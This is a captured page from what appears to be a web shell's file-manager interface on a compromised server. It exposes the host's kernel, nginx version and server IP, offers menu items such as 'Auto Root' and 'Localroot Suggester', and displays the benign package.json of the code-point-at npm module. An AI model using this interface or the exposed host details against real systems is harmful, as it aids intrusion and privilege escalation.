Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 13.59.141.195
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
code-point-at /
Delete
Unzip
Name
Size
Permission
Date
Action
index.js
610
B
-rw-rw-r--
2022-08-30 11:49
license
1.09
KB
-rw-rw-r--
2022-08-30 11:49
package.json
648
B
-rw-rw-r--
2022-08-30 11:49
readme.md
617
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "code-point-at", "version": "1.1.0", "description": "ES2015 `String#codePointAt()` ponyfill", "license": "MIT", "repository": "sindresorhus/code-point-at", "author": { "name": "Sindre Sorhus", "email": "sindresorhus@gmail.com", "url": "sindresorhus.com" }, "engines": { "node": ">=0.10.0" }, "scripts": { "test": "xo && ava" }, "files": [ "index.js" ], "keywords": [ "es2015", "ponyfill", "polyfill", "shim", "string", "str", "code", "point", "at", "codepoint", "unicode" ], "devDependencies": { "ava": "*", "xo": "^0.16.0" } }